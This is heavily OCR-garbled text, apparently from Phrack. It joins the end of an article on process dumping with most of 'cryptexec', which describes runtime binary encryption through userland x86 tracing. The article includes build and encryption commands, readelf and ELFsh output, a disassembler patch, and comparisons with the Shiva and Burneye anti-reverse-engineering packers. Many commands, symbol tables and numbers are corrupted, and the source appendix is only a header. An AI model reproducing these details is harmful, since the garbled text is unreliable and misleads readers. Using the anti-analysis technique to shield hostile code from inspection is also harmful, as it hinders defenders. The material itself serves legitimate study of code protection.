variables modified in runtime, as execution of the recovered program 
depends in the state of these variables. There’s no history about memory 
modified by a process, so return to a previous state of the data segment is 
impossible, again, for now. 


-—-[ 8.0 -— Conclusion 


"Reversing" term reveals a funny feature: every time a new technique 
appears, another one defeat it, in both sides. As in the virus scene, a 
new patch will follow to anew development. Everytim a new forensics 
method is released, a new anti-forensics one appears. There’s a crack 
for almost every protected application, and a new version of that program 
will protect from that crack. 


In this paper, some of the methods hiding code (even if it’s not 
malicious) were defeated with simply reversing how a process is built. 
Further investigation may leave this method inefficient due to load design 
of the kernel in the studied system. In fact, once a method is known, it’s 
easy to defeat, and the on presented in this article is not an exception 
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ilo Process dumping for binary reconstruction: pd 
http://www.reversing.org/ 


--[{ 11 - Source Code 
This is not the last version of PD. For further information about 
this project please refer to http://www.reversing.org 
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|=------ =[ cryptexec: Next-generation runtime binary encryption ]=------- = 
|=------ =[ using on-demand function extraction ]=------- = 


| 
| [ Zeljko Vrba <zvrba@globalnet.hr> ] 
| 


ABSTRACT 


Please excuse my awkward English, it is not my native language. 


What is binary encryption and why encrypt at all? For the answer to 
this question the reader is referred to the Phrack#58 [1] and article 
therein titled "Runtime binary encryption". This article describes a 
method to control the target program that doesn’t does not rely on 
any assistance from the OS kernel or processor hardware. The method 
is implemented in x86-32 GNU AS (AT&T syntax). Once the controlling 
method is devised, it is relatively trivial to include on-the-fly 
code decryption. 
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Note: Footnotes are marked by # and followed by the number. They ar 
listed at the end of each section. 


--[{ 1.0 - Introduction 


First let me introduce some terminology used in this article so that 
the reader is not confused. 


o The attributes "target", "child" and "traced" are used interchangeably 
(depending on the context) to refer to the program being under the 
control of another program. 


o The attributes "controlling" and "tracing" are used interchangeably to 
refer to the program that controls the target (debugger, strace, etc.) 


--[ 2.0 - OS- and hardware-assisted tracing 


Current debuggers (both under Windows and UNIX) use x86 hardware 
features for debugging. The two most commonly used features are the trac 
flag (TF) and INT3 instruction, which has a convenient 1-byt ncoding of 
OxCC. 


TF resides in bit 8 of the EFLAGS register and when set to 1 the pro- 
cessor generates exception 1 (debug exception) after each instruction 
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is executed. When INT3 is executed, the processor generates exception 3 
(breakpoint). 


The traditional way to trace a program under UNIX is the ptrace(2) 
syscall. The program doing the trace usually does the following 
(shown in pseudocode) : 


fork () 
child: ptrace (PT_TRACE_ME) 
execve ("the program to trace") 

parent: controls the traced program with other ptrace() calls 

Another way is to do ptrace(PT_ATTACH) on an already existing process. 
Other operations that ptrace() interface offers are reading/writing target 
instruction/data memory, reading/writing registers or continuing the 
execution (continually or up to the next system call - this capability is 


used by the well-known strace(1) program). 


Each time the traced program receives a signal, the controlling program’s 
ptrace() function returns. When the TF is turned on, the traced program 
receives a SIGTRAP after each instruction. The TF is usually not turned 
on by the traced program#1, but from the ptrace(PT_STEP). 


Unlike TF, the controlling program places O0xCC opcode at strategic#2 
places in the code. The first byte of the instruction is replaced with 
OxCC and the controlling program stores both the address and the original 
opcode. When execution comes to that address, SIGTRAP is delivered and 
the controlling program regains control. Then it replaces (again using 
ptrace()) OxCC with original opcode and single-steps the original 
instruction. After that the original opcode is usually again replaced 
with OxCC. 


Although powerful, ptrace() has several disadvantages: 


1. The traced program can be ptrace()d only by one controlling program. 


2. The controlling and traced program live in separate address spaces, 
which makes changing traced memory awkward. 


3. ptrace() is a system call: it is slow if used for full-blown tracing 
of larger chunks of code. 


I won’t go deeper in the mechanics of ptrace(), there are available 
tutorials [2] and the man page is pretty self-explanatory. 


1 Although nothing prevents it to do so - it is in the user-modifiable 
portion of EFLAGS. 
2 Usually the person doing the debugging decides what is strategic. 


--[ 3.0 - Userland tracing 


The tracing can be done solely from the user-mode: the instructions 
are executed natively, except control-transfer instructions (CALL, JUMP, 
Jcc, RET, LOOP, JCXZ). The background of this idea is explained 

nicely in [3] on the primitive 1960’s MIX computer designed by Knuth. 


Features of the method I’m about to describe: 


o It allows that only portions of the executable file are encrypted. 


o Different portions of the executable can be encrypted with different 
keys provided there is no cross-calling between them. 


o It allows encrypted code to freely call non-encrypted code. In this 
case the non-encrypted code is also executed instruction by instruction. 
When called outside of encrypted code, it still executes without 
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tracing. 


o There is never more than 24 bytes of encrypted code held in memory in 
plaintext. 


o OS- and language-independent. 


The rest of this section explains the provided API, gives a high-level 
description of the implementation, shows a usage example and discusses 
Here are the details of my own implementation. 


----[ 3.1 - Provided API 


No “official" header file is provided. Because of the sloppy and 
convenient C parameter passing and implicit function declarations, you 
can get away with no declarations whatsoever. 


The decryption API consists of one typedef and one function. 


typedef (*decrypt_fn_ptr) (void *key, unsigned char *dst, const unsigned 
char *src); 


This is the generic prototype that your decryption routine must fit. It 
is called from the main decryption routine with the following arguments: 


o key: pointer to decryption key data. Note that in most cases this is 
NOT the raw key but pointer to some kind of "decryption context". 


o dst: pointer to destination buffer 


Oo src: pointer to source buffer 


Note that there is no size argument: the block size is fixed to 8 
bytes. The routine should not read more than 8 bytes from the sre and NEVER 
output more than 8 bytes to dst. 


Another unusual constraint is that the decryption function MUST NOT 
modify its arguments on the stack. If you need to do this, copy the stack 
arguments into local variables. This is a consequence of how the routine 
is called from within the decryption engin s the code for details. 


There are no constraints whatsoever on the kind of encryption which can 
be used. ANY bijective function which maps 8 bytes to 8 bytes is suitable. 
Encrypt the code with the function, and use its inverse for the 
decryption. If you use the identity function, then decryption becomes 
simple single-stepping with no hardware support -- see section 4 for 
related work. 


The entry point to the decryption engine is the following function: 


int crypt_exec(decrypt_fn_ptr dfn, const void *key, const void *lo_addr, 
const void *hi_addr, const void *F, ...); 


The decryption function has the capability to switch between executing 
both encrypted and plain-text code. The encrypted code can call the 
plain-text code and plain-text code can return into the encrypted code. 
But for that to be possible, it needs to know the address bounds of the 
encrypted code. 


Note that this function is not reentrant! It is not allowed for ANY 
kind of code (either plain-text or encrypted) running under the crypt_exec 
routine to call crypt_exec again. Things will break BADLY because the 
internal state of previous invocation is statically allocated and will 
get overwritten. 


The arguments are as follows: 
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o dfn: Pointer to decryption function. The function is called with the 
key argument provided to crypt_exec and the addresses of destination 
and source buffers. 


o key: This are usually NOT the raw key bytes, but the initialized 
decryption context. S th xample code for the test2 program: first 
the user-provided raw key is loaded into the decryption context and the 
address of the _context_ is given to the crypt_exec function. 


o lo_addr, hi_addr: These are low and high addresses that are encrypted 
under the same key. This is to facilitate calling non-encrypted code 
from within encrypted code. 


Oo F: pointer to the code which should b xecuted under the decryption 
engine. It can be an ordinary C function pointer. Since the tracing 
routine was written with 8-byte block ciphers in mind, the F function 
must be at least 8-byte aligned and its length must be a multiple of 8. 
This is easier to achieve (even with standard C) than it sounds. See the 
example below. 


Oo ... become arguments to the called function. 


crypt_exec arranges to function F to be called with the arguments 
provided in the varargs list. When crypt_exec returns, its return value is 
what the F returned. In short, the call 


xX = crypt_exec(dfn, key, lo_addr, hi_addr, F, ...); 


has exactly the same semantics as 


would have, were F plain-text. 

Currently, the code is tailored to use the XDE disassembler. Other 
disassemblers can be used, but the code which accesses results must be 
changed in few places (all references to the disbuf variable). 


The crypt_exec routine provides a private stack of 4kB. If you use your 
own decryption routine and/or disassembler, take care not to consume too 
much stack space. If you want to enlarge the local stack, look for the 
local_stk label in the code. 


3 In the rest of this article I will call this interchangeably tracing 
or decryption routine. In fact, this is a tracing routine with added 
decryption. 


SSS 3:52 High-level description 


The tracing routine maintains two contexts: the traced context and 
its own context. The context consists of 8 32-bit general-purpose 
registers and flags. Other registers are not modified by the routine. 
Both contexts are held on the private stack (that is also used for 
calling C). 


The idea is to fetch, one at a time, instructions from the traced 
program and execute them natively. Intel instruction set has rather 
irregular encoding, so the XDE [5] disassembler engine is used to find 
both the real opcode and total instruction length. During experiments on 
FreeBSD (which uses LOCK- prefixed MOV instruction in its dynamic loader) 
I discovered a bug in XDE which is described and fixed below. 


We maintain our own EIP in traced_eip, round it down to the next lower 
8-byte boundary and then decrypt#4 24 bytes#5 into our own buffer. Then 
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the disassembly takes place and the control is transferred to emulation 
routines via the opcode control table. All instructions, except control 
transfer, ar xecuted natively (in traced context which is restored at 
appropriate time). After single instruction execution, the control is 
returned to our tracing routine. 


In order to prevent losing control, the control transfer instructions#6 
ar mulated. The big problem was (until I solved it) emulating indirect 
JMP and CALL instructions (which can appear with any kind of complex EA 
that i386 supports). The problem is solved by replacing the CALL/JMP 
instruction with MOV to register opcode, and modifying bits 3-5 (reg 
field) of modR/M byte to set the target register (this field holds the 
part of opcode in the CALL/JMP case). Then we let the processor to 
calculate the EA for us. 


Of course, a means are needed to stop the encrypted execution and to 
enable encrypted code to call plaintext code: 


1. On entering, the tracing engine pops the return address and its 
private arguments and then pushes the return address back to the 
traced stack. At that moment: 


o The stack frame is good for executing a regular C function (F). 


o The top of stack pointer (esp) is stored into end_esp. 


2. When the tracing routine encounters a RET instruction it first checks 
the traced_esp. If it equals end_esp, it is a point where the F 
function would hav nded. Therefore, we restore the traced context 
and do not emulate RET, but let it execute natively. This way the 
tracing routine loses control and normal instruction execution 
continues. 


In order to allow encrypted code to call plaintext code, there are 
lo_addr and hi_addr parameters. These parameters determine the low and high 
boundary of encrypted code in memory. If the traced_eip falls out of 
[lo_addr, hi_addr) range, the decryption routine pointer is swapped with 
the pointer to a no-op "decryption" that just copies 8 bytes from source 
to destination. When the traced_eip again falls into that interval, the 
pointers are again swapped. 


4 The decryption routine is called indirectly for reasons described 

later. 

5 The number comes from worst-case considerations: if an instruction 

begins at a boundary that is 7 (mod 8), given maximum instruction 

length of 15 bytes, yields a total of 22 bytes = 3 blocks. The buffer 
has 32 bytes in order to accommodate an additional JMP indirect 
instruction after the traced instruction. The JMP jumps indirectly to 
place in the tracing routine where execution should continue. 

#6 INT instructions are not considered as control transfer. After (if) 

the OS returns from the invoked trap, the program execution continues 

sequentially, the instruction right after INT. So there are no special 

measures that should be taken. 


----[ 3.3 - Actual usage example 


Given encrypted execution engine, how do we test it? For this purpose I 
have written a small utility named cryptfile that encrypts a portion of 
the executable file ($ is UNIX prompt): 


S gcc -—¢c¢. cast5.c¢ 

S$ gcc cryptfile.c cast5.o -o cryptfile 

S ./cryptfile 

USAGE: ./cryptfile <-e_-d> FILE KEY STARTOFF ENDOFE 
KEY MUST be 32 hex digits (128 bits). 


The parameters are as follows: 
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o -e,-d: one of these is MANDATORY and stands for encryption 
or decryption. 


o FILE: the executable file to b nerypted. 


o KEY: the encryption key. It must be given as 32 hex digits. 


o STARTOFF, ENDOFF: the starting and ending offset in the file that should 
be encrypted. They must be a multiple of block size (8 bytes). If not, 
the file will be correctly encrypted, but the encrypted execution will 
not work correctly. 


The whole package is tested on a simple program, test2.c. This program 
demonstrates that encrypted functions can call both encrypted and plaintext 
functions as well as return results. It also demonstrates that the engine 
works even when calling functions in shared libraries. 


Now we build the encrypted execution engine: 


S gcc -c crypt_exec.S 
$ cd xdel101 

S gcc -c xde.c 

$ cd 

$ 


ld -r cast5.o crypt_exec.o xdel01/xde.o -o crypt_monitor.o 


I’m using patched XDE. The last step is to combine several relocatable 
object files in a single relocatable file for easier linking with other 
programs. 


Then we proceed to build the test program. We must ensure that 
functions that we want to encrypt are aligned to 8 bytes. I’m specifying 16 
, just in case. Therefore: 


S gcc -falign-functions=16 -g test2.c crypt_monitor.o -o test2 


We want to encrypt functions fl and £2. How do wemap from function 
names to offsets in the executable file? Fortunately, this can be simply 
done for ELF with the readelf utility (that’s why I chose such an awkward 
way - I didn’t want to bother with yet another ELF ’/parser’). 


S readelf -s test2 


Symbol table ’.dynsym’ contains 23 entries: 
Num: Value Size Type Bind Vis Ndx Name 
0: 00000000 OQ NOTYPE LOCAL DEFAULT UND 
1: 08048484 57 FUNC GLOBAL DEFAUL UND printf 
2: 08050aa4 0 OBJECT GLOBAL DEFAULT ABS _DYNAMIC 
3: 08048494 0 FUNC GLOBAL DEFAUL UND memcpy 
4: 08050b98 4 OBJECT GLOBAL DEFAULT 20 __stderrp 
5: 08048468 0 FUNC GLOBAL DEFAUL 8 _init 
6: O08051c74 4 OBJECT GLOBAL DEFAULT 20 environ 
7: 080484a4 52 FUNC GLOBAL DEFAUL UND fprintf 
8: 00000000 0 NOTYPE WEAK DEFAUL UND __deregister_frame.. 
9: 0804fc00 4 OBJEC GLOBAL DEFAUL 13 __progname 
10: 080484b4 172 FUNC GLOBAL DEFAUL UND sscanf 
11: 08050b98 OQ NOTYPE GLOBAL DEFAULT ABS __bss_start 
12: 080484c4 0 FUNC GLOBAL DEFAUL UND memset 
13: 0804ca64 0 FUNC GLOBAL DEFAUL ee ele ola 
14: 080484d4 337 FUNC GLOBAL DEFAULT UND atexit 
15: 080484e4 121 FUNC GLOBAL DEFAULT UND scanf 
16: 08050b98 O NOTYPE GLOBAL DEFAUL ABS _edata 
17: O08050b68 Q OBJECT GLOBAL DEFAULT ABS _GLOBAL_OFFSET_TABLE _ 
18: 08051c78 OQ NOTYPE GLOBAL DEFAULT ABS _end 
19: 080484f4 101 FUNC GLOBAL DEFAULT UND exit 
20: 08048504 0 FUNC GLOBAL DEFAUL UND strlen 
21: 00000000 O NOTYPE WEAK DEFAUL UND _Jv_RegisterClasses 
22: 00000000 O NOTYPE WEAK DEFAUL UND __register_frame_info 
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’.symtab’ contains 145 entries: 
Value Size Type Bind vis 

00000000 0 NOTYPE LOCAL DEFAULT 
O80480f4 Q SECTION LOCAL DEFAULT 
08048110 0 SECTION LOCAL DEFAUL 
08048128 Q SECTION LOCAL DEFAUL 
080481d0 Q SECTION LOCAL DEFAUL 
08048340 Q SECTION LOCAL DEFAUL 
08048418 Q SECTION LOCAL DEFAUL 
08048420 Q SECTION LOCAL DEFAUL 
08048468 Q SECTION LOCAL DEFAUL 
08048474 Q SECTION LOCAL DEFAUL 
08048520 Q SECTION LOCAL DEFAUL 
0804ca64 Q SECTION LOCAL DEFAUL 
0804ca80 Q SECTION LOCAL DEFAUL 
0804fc00 Q SECTION LOCAL DEFAULT 
08050aa0 Q SECTION LOCAL DEFAUL 
08050aa4 Q SECTION LOCAL DEFAUL 
08050b54 Q SECTION LOCAL DEFAUL 
08050b5c Q SECTION LOCAL DEFAUL 
08050b64 Q SECTION LOCAL DEFAUL 
08050b68 Q SECTION LOCAL DEFAUL 
08050b98 Q SECTION LOCAL DEFAUL 
00000000 0 SECTION LOCAL DEFAUL 
00000000 0 SECTION LOCAL DEFAULT 
00000000 0 SECTION LOCAL DEFAULT 
00000000 0 SECTION LOCAL DEFAUL 
00000000 0 SECTION LOCAL DEFAULT 
00000000 0 SECTION LOCAL DEFAUL 
00000000 0 SECTION LOCAL DEFAUL 
00000000 0 SECTION LOCAL DEFAUL 
00000000 0 SECTION LOCAL DEFAUL 
00000000 0 SECTION LOCAL DEFAUL 
00000000 0 SECTION LOCAL DEFAUL 
00000000 0 FILE ,OCAL DEFAUL 
08050b54 0 OBJECT LOCAL DEFAUL 
08050b5c 0 OBJECT AOCAL DEFAUL 
08050aa0 0 OBJECT ,OCAL DEFAUL 
08050b64 0 OBJECT ,OCAL DEFAUL 
0804fc08 0 OBJECT LOCAL DEFAULT 
08050b9c 1 OBJECT LOCAL DEFAUL 
080485b0 0 FUNC AOCAL DEFAUL 
08050ba0 24 OBJECT LOCAL DEFAUL 
08048610 0 FUNC LOCAL DEFAUL 
00000000 0 FILE LOCAL DEFAUL 
08050b58 0 OBJECT LOCAL DEFAUL 
08050b60 0 OBJEC LOCAL DEFAUL 
08050aa0 0 OBJECT AOCAL DEFAUL 
08050b64 0 OBJECT ,OCAL DEFAUL 
0804ca30 0 FUNC LOCAL DEFAUL 
00000000 0 FILE ,OCAL DEFAUL 
08048660 75 FUNC ,OCAL DEFAULT 
080486b0 58 FUNC ,OCAL DEFAUL 
08050bb8 16 OBJECT LOCAL DEFAUL 
080486f0 197 FUNC LOCAL DEFAUL 
00000000 0 FILE LOCAL DEFAUL 
0804cba0 024 OBJECT ,OCAL DEFAUL 
0804cfa0 024 OBJECT LOCAL DEFAUL 
0804d3a0 024 OBJECT LOCAL DEFAUL 
0804d7a0 024 OBJECT LOCAL DEFAUL 
0804dba0 024 OBJECT ,OCAL DEFAULT 
0804dfa0 024 OBJECT sOCALDEFAULT 12 
0804e3a0 024 OBJECT AOCAL DEFAUL 
0804e7a0 1024 OBJECT ,OCAL DEFAULT 
0804a3c0 3734 FUNC LOCAL DEFAUL 
0804b408 OQ NOTYPE LOCAL DEFAUL 
O08051bf£0 OQ NOTYPE LOCAL DEFAUL 
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end_esp 


traced_ctr 
decryptloop 
traced_esp 


stk_end 


decryptloop_nocontext 


.store_decrypt_ptr 


decrypt 
insn 
disbuf 
ilen 
continue 


control_table 
_unhandled 


_nonjump 
-execute 


_jcc_rel8 


_jec_rel32 


-_jcc_rel 
-_jcc_rel]l 


132 insn 
132_true 


-_jcc_rel] 


132 false 


TYPE sOCAL DEF AU 
TYPE sOCAL DEFAU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
YPE sOCAL DEFAU 
YPE LOCAL DEFAU 
YPE sOCAL DEFAU 
YPE LOCAL DEF AU 
YPE sOCAL DEF AU 
YPE LOCAL DEFAU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEFAU 
TYPE sOCAL DEFAU 
TYPE sOCAL DEFAU 
YPE LOCAL DEFAU 
YPE LOCAL DEF AU 
YPE LOCAL DEFAU 
YPE sOCAL DEF AU 
YPE LOCAL DEF AU 
YPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
YPE sOCAL DEF AU 
YPE LOCAL DEFAU 
YPE sOCAL DEF AU 
YPE LOCAL DEF AU 
YPE sOCAL DEFAU 
YPE LOCAL DEFAU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEFAU 
TYPE sOCAL DEFAU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
TYPE sOCAL DEF AU 
YPE LOCAL DEF AU 
YPE sOCAL DEF AU 
TYPE LOCAL DEF AU 
YPE sOCAL DEF AU 
YPE LOCAL DEF AU 
iB sOCAL DEF AU 
TYPE GLOBAL DEFAU 
NC GLOBAL DEFAU 
JECT GLOBAL DEFAU 
NC GLOBAL DEFAU 
NC GLOBAL DEFAU 
JECT GLOBAL DEFAU 
JECT GLOBAL HIDDE 
NC GLOBAL DEFAU 
NC GLOBAL DEFAU 
NC GLOBAL DEFAU 
JECT GLOBAL DEFAU 
NC GLOBAL DEFAU 
TYPE WEAK DEF AU 
JECT GLOBAL DEFAU 
NC GLOBAL DEFAU 
NC GLOBAL DEFAU 
NC GLOBAL DEFAU 
TYPE GLOBAL DEFAU 
NC GLOBAL DEFAU 
NC GLOBAL DEFAU 
NC GLOBAL DEFAU 


rel_offset_fixup 
_retn 

-_endtrace 
_loopne 
_loop_insn 
_doloop 

loope 

loop 
loop_insn_true 
_loop_insn_false 
JCxz 
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_call 
_jmp_rels 
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—grps 

1 _grp5_continue 

20 our_esp 
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UND printf 

ABS _DYNAMIC 

UND memcpy 

10 xde_disasm 

20 __stderrp 

13 __dso_handle 

10 reg2xset 

8 init 
10 xde_asm 
20 environ 


UND fprintf 

UND __deregister_frame.. 
13 __progname 

10 _start 

10 cast5_setkey 

UND sscanf 

ABS __bss_start 

UND memset 

10 main 

Ta fans 
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133: 080484d4 337 FUNC GLOBAL DEFAULT UND atexit 

134: 080484e4 121 FUNC GLOBAL DEFAULT UND scanf 

135: 08050200 2208 OBJECT GLOBAL DEFAULT 13 xde_table 

136: 08050b98 OQ NOTYPE GLOBAL DEFAULT ABS _edata 

137: 08050b68 Q OBJECT GLOBAL DEFAULT ABS _GLOBAL_OFFSET_TABLE _ 

138: 08051c78 0 NOTYPE GLOBAL DEFAUL ABS _end 

139: 08049660 3421 FUNC GLOBAL DEFAUL 10 cast5_decrypt 

140: 080484f4 101 FUNC GLOBAL DEFAUL UND exit 

141: 08048900 3421 FUNC GLOBAL DEFAUL 10 cast5_encrypt 

142: 08048504 0 FUNC GLOBAL DEFAUL UND strlen 

143: 00000000 O NOTYPE WEAK DEFAUL UND _Jv_RegisterClasses 

144: 00000000 0 NOTYPE WEAK DEFAULT UND __register_frame_info 
We see that function fl has address 0x8048660 and size 75 = Ox4B. 

Function f2 has address 0x80486BO and size 58 = 3A. Simple calculation 


shows that they are in fact consecutive in memory so we don’t have to 
encrypt them separately but in a single block ranging from 0x8048660 to 
Ox80486F0. 


S$ readelf -l test2 


Elf file type is EXEC (Executable file) 
Entry point 0x8048520 
There are 6 program headers, starting at offset 52 
Program Headers: 
Type Offset VirtAddr PhysAddr FileSiz MemSiz 
Flg Align 
PHDR 0x000034 0x08048034 0x08048034 0x000c0 0x000c0 R E 0x4 
INTERP Ox0000f4 Ox080480f4 0x080480f4 0x00019 0x00019 R Oxl 
[Requesting program interpreter: /usr/libexec/ld-elf.so.1] 
LOAD 0x000000 0x08048000 0x08048000 Ox06bed 0x06bed R E 0x1000 
LOAD 0x006c00 Ox0804fc00 Ox0804fc00 Ox00f98 0x02078 RW 0x1000 
DYNAMIC 0x007aa4 0x08050aa4 0x08050aa4 0x000b0 0x000b0 RW 0x4 
NOTE 0x000110 0x08048110 0x08048110 0x00018 0x00018 R Ox4 
Section to Segment mapping: 
Segment Sections... 
00 
Ol .interp 
02 -interp .note.ABI-tag .hash .dynsym .dynstr .rel.dyn .rel.plt 
-init .plt .text .fini .rodata 
03 .data .eh_frame .dynamic .ctors .dtors .jcr .got .bss 
04 -dynamic 
05 -note.ABI-tag 


>From this we see that both addresses (0x8048660 and 0x80486F0) fall into 
the first LOAD segment which is loaded at VirtAddr 0x804800 and is placed 
at offset 0 in the file. Therefore, to map virtual address to file offset 
we simply subtract 0x8048000 from each address giving 0x660 = 1632 and 
Ox6FO = 1776. 


If you obtain ELFsh [7] then you can make your life much easier. The 
following transcript shows how ELFsh can be used to obtain the same 
information: 


S elfsh 


Welcome to The ELF shell 0.51b3 


This software is under the General Public License 
Please visit http://www.gnu.org to know about Free Software 


= 


ELFsh-0.51b3]$ load test2 


[*] New object test2 loaded on Mon Jun 13 20:45:33 2005 


= 


ELFsh-0.51b3]$ sym fl 
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[SYMBOL TABLE] 
[Object test2] 


[059] 0x8048680 FUNCTION f1 
size:0000000075 foffset:001632 scope:Local sctndx:10 => .text + 304 


a 


ELFsh-0.51b3]$ sym f2 


[SYMBOL TABLE] 
[Object test2] 


[060] 0x80486d0 FUNCTION £2 
size:0000000058 foffset:001776 scope:Local sctndx:10 => .text + 384 


= 


ELFsh-0.51b3]S exit 


[*] Unloading object 1 (test2) * 


Good bye ! .::. The ELF shell 0.51b3 


The field foffset gives the symbol offset within the executable, while 
size is its size. Here all the numbers are decimal. 


Now we are ready to encrypt a part of the executable with a very 
‘imaginative’ password and then test the program: 


S echo -n "password" | openssl md5 
5f4dcc3b5aa765d61d8327deb882cf99 

S ./cryptfile -e test2 5f4dcc3b5aa765d61d8327deb882cf99 1632 1776 
S chmod +x test2.crypt 

S ./test2.crypt 


At the prompt enter the same hex string and then enter numbers 12 and 
34 for a and b. The result must be 1662, and esp before and after must be 
the same. 


Once you are sure that the program works correctly, you can strip(1) 
symbols from it. 


----[ 3.4 - XDE bug 


=| 


During the development, aI have found a bug in the XDE disassembler 
engine: it didn’t correctly handle the LOCK (0xF0O) prefix. Because of the 
bug XDE claimed that OxFO is a single-byte instruction. This is the 
needed patch to correct the disassembler: 


--- xde.c Sun Apr 11 02:52:30 2004 
+++ xde_new.c Mon Aug 23 08:49:00 2004 
@@ -101,6 +101,8 @@ 

if (c == OxFO) 

{ 

if (diza->p_lock != 0) flag |= C_BAD; /* twice */ 

+ diza->p_lock = c; 
+ continue; 


} 


break; 


I also needed to remove __cdecl on functions, a ’feature’ of Win32 C 
compilers not needed on UNIX platforms. 


----[{ 3.5 - Limitations 
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(e) 


XDE engine (probably) can’t handle new instructions (SSE, MMX, etc.). 
For certain it can’t handle 3dNow! because they begin with Ox0F Ox0OF, 


a byte sequence for which the XDE claims is an invalid instruction 
encoding. 


The tracer shares the same memory with the traced program. If the traced 
program is so badly broken that it writes to (random) memory it doesn’t 
own, it can stumble upon and overwrite portions of the tracing routine. 


Each form of tracing has its own speed impacts. I didn’t measure how 
much this method slows down program execution (especially compared to 
ptrace()). 


Doesn’t handle even all 386 instructions (most notably far calls/jumps 
and RET imml6). In this case the tracer stops with HLT which should 
cause GPF under any OS that runs user processes in rings other than 0. 


The block size of 8 bytes is hardcoded in many places in the program. 
The source (both C and ASM) should be parametrized by some kind of 
BLOCKSIZE #define. 


The tracing routine is not reentrant! Meaning, any code being executed 
by crypt_exec can’t call again crypt_exec because it will overwrite its 
own context! 


The code itself isn’t optimal: 
—- identity_decrypt could use 4-byte moves. 
More registers could be used to minimize memory references. 


----[ 3.6 - Porting considerations 


[This is as heavy as it gets - there isn’t a single piece of machine- 


independent code in the main routine that could be used on an another 
processor architecture. I believe that porting shouldn’t be too difficult, 
mostly rewriting the mechanics of the current program. Some points to 
watch out for include: 


(e) 


(e) 


Be sure to handle all control flow instructions. 


Move instructions could affect processor flags. 


Write a disassembly routine. Most RISC architectures have regular 
instruction set and should be far easier to disassemble than x86 code. 


This is self-modifying code: flushing the instruction prefetch queue 
might be needed. 


Handle delayed jumps and loads if the architecture provides them. This 
could be tricky. 


You might need to get around page protections before calling the 
decryptor (non-executable data segments). 


Due to unavailability of non-x86 hardware I wasn’t able to implement 


the decryptor on another processor. 


--[{ 4 - Further ideas 


(e) 


Better encryption scheme. ECB mode is bad, especially with 
small block size of 8 bytes. Possible alternative is the following: 


1. Round the traced_eip down to a multiple of 8 bytes. 
2. Encrypt the result with the key. 
3. Kor the result with the instruction bytes. 
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That way the encryption depends on the location in memory. Decryption 
works the same way. However, it would complicate cryptfile.c program. 


o Encrypted data. Devise a transparent (for the C programmer) way to 
access the encrypted data. At least two approaches come to mind: 
1) playing with page mappings and handling read/write faults, 


= 


or 2) use XDE to decode all accesses to memory and perform encryption 
or decryption, depending on the type of access (read or write). The 
first approach seems too slow (many context switches per data read) 


to be practical. 


o New instruction sets and architectures. 


= 


Expand XDE to handle new x86 


instructions. Port the routine to architectures other than i386 (first 
comes to mind AMD64, then ARM, SPARC...). 


o Perform decryption on the smart card. This is slow, but there is no 


danger of key compromise. 


o Polymorphic decryption engine. 


[ 3 Related Work 


This section gives a brief overview of existing work, ither because of 
Similarity in coding techniques (ELFsh and tracing without ptrace) or 


because of the code protection aspect. 


5.1 ELFsh 


A 


The 


Fsh crew’s article on elfsh and e2dbg [7], also in this Phrack 


issue. A common point in our work is the approach to program tracing 
without using ptrace(2). Their latest work is a scriptable embedded ELF 
debugger, e2dbg. They are also getting around PaX protections, an issue I 


didn’t even take into account. 


The Shiva binary encryptor [8], released in binary-only form. It tries 


really hard to prevent revers ngineering by including features such as 
trap flag detection, ptrace() defense, demand-mapped blocks (so that 
fully decrpyted image can’t be dumped via /proc), using int3 to emulate 


some instructions, and by encryption in layers. The 2nd, password 
protected layer, is optional and encrypted using 128-bit AES. Layer 3 
encryption uses TEA, the tiny encryption algorithm. 


According to the analysis in [9], "for sufficiently large programs, no 
more than 1/3 of the program will be decrypted at any given time". This 
is MUCH larger amount of decrypted program text than in my case: 24 
bytes, independent of any external factors. Also, Shiva is heavily 
tied to the ELF format, while my method is not tied to any operating 
system or executable format (although the current code IS limited to 


the 32-bit x86 architecture). 


5.3 Burneye 


There are actually two tools released by team-teso: burneye and burneye2 


(objobf) [10]. 


Burneye is a powerful binary encryption tool. Similarly to Shiva, it has 
three layers: 1) obfuscation, 2) password-based encryption using RC4 and 
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SHA1 (for generating the key from passphrase), and 3) the fingerprinting 
layer. 


[The fingerprinting layer is the most interesting one: the data about the 
target system is collected (e.g. amount of memory, etc..) and made into 

a 'fingeprint’. The executable is encrypted taking the fingerprint into 
account so that the resulting binary can be run only on the host with the 
given fingerprint. There are two fingerprinting options: 


o Fingeprint tolerance can be specified so that Small deviations are 
allowed. That way, for example, the memory can be upgraded on the 
target system and the executable will still work. If the number of 
differences in the fingeprint is too large, the program won’t work. 


o Seal: the program produced with this option will run on any system. 
However, the first time it is run, it creats a fingerprint of the 
host and ’seals’ itself to that host. The original seal binary is 
securely deleted afterwards. 


The encrypted binary can also be made to delete itself when a certain 
environment variable is set during the program execution. 


objobf is just relocatable object obfuscator. There is no encryption 
layer. The input is an ordinary relocatable object and the output is 
transformed, obfuscated, and functionally equivalent code. Code 
transformations include: inserting junk instructions, randomizing the 
order of basic blocks, and splitting basic blocks at random points. 


5.4 Conclusion 


Highlights of the distinguishing features of the code encryption 
technique presented her 


o Very small amount of plaintext code in memory at any time - only 24 
bytes. Other tools leave much more plain-text code in memory. 


o No special loaders or executable format manipulations are needed. Ther 
is one simple utility that encrypts the existing code in-place. It is 
executable format-independent since its arguments are function offsets 
within the executable (which map to function addresses in runtime). 


o The code is tied to the 32-bit x86 architecture, however it should be 
portable without changes to any operating system running on x86-32. 
Special arrangements for setting up page protections may be necessary 
if PaX or NX is in effect. 


On the downside, the current version of th ngine is very vulnerable 
with respect to revers ngineering. It can be easily recognized by 
scanning for fixed sequences of instructions (the decryption routine). 
Once the decryptor is located, it is easy to monitor a few fixed memory 
addresses to obtain both the EIP and the original instruction residing at 
that EIP. The key material data is easy to obtain, but this is the case 
in ANY approach using in-memory keys. 


However, the decryptor in its current form has one advantage: since it is 
ordinary code that does no special tricks, it should be easy to combine 
it with a tool that is more resilient to revers ngineering, like Shiva 
or Burneye. 
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--[ A - Appendix: Source code 
Here I’m providing only my own source code. The complete source package 
can be obtained from [6]. It includes: 


o All source listed here, 
o the patched XDE disassembler, and 
o the source of the CAST5 cryptographic algorithm. 


